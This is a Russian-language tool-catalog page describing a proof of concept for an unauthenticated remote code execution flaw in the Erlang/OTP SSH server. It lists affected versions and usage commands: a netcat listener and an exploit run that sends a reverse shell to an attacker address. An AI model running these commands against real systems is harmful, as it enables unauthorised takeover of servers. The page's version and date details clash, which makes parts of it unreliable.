Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE — PoC, демонстрирующий неаутентифицированное удаленное выполнение кода в SSH-сервере Erlang/OTP. Используя уязвимость в обработке сообщений протокола SSH, злоумышленник может выполнять произвольные команды на целевой системе без действительных учетных данных. | Kitploit
Инструменты/GitHubGitHub/dollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubdollarboysushil/cve-2025-32433-erlang-otp-ssh-unauthenticated-rce

CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE

PoC, демонстрирующий неаутентифицированное удаленное выполнение кода в SSH-сервере Erlang/OTP. Используя уязвимость в обработке сообщений протокола SSH, злоумышленник может выполнять произвольные команды на целевой системе без действительных учетных данных.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
311 месяцев назадЕщё не проверено

CVE-2025-32433 - Erlang/OTP SSH RCE PoC

CVE-2025-32433

Обзор

PoC, демонстрирующий неаутентифицированное удаленное выполнение кода на SSH-сервере Erlang/OTP.
Используя уязвимость в обработке сообщений протокола SSH, злоумышленник может выполнять произвольные команды на целевой системе без действительных учетных данных.

  • CVE: CVE-2025-32433
  • Оценка CVSS: 10.0 (Критическая)
  • Затронутые версии:
    • OTP-27.3.3 и более ранние
    • OTP-26.2.5.11 и более ранние
    • OTP-25.3.2.20 и более ранние

Эта проблема исправлена в OTP-27.3.3, OTP-26.2.5.11 и OTP-25.3.2.20.

Ссылки

  • Уведомление Unit42
  • Репозиторий PoC
  • Запись NVD

Использование

Настройка слушателя:

root@kitploit:~
nc -lvnp 1234

alt text Запуск эксплойта:

root@kitploit:~
python3 CVE-2025-32433-dbs --rhost <TARGET_IP> --rport <TARGET_PORT> --lhost <ATTACKER_IP> --lport <ATTACKER_PORT>
  • --rhost : IP-адрес цели
  • --rport : SSH-порт цели
  • --lhost : Ваш IP для обратной оболочки
  • --lport : Ваш порт слушателя

alt text

alt text

Отказ от ответственности

Этот репозиторий предназначен только для образовательных целей. Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного разрешения. Неправильное использование может быть незаконным и строго запрещено.

Скачать инструмент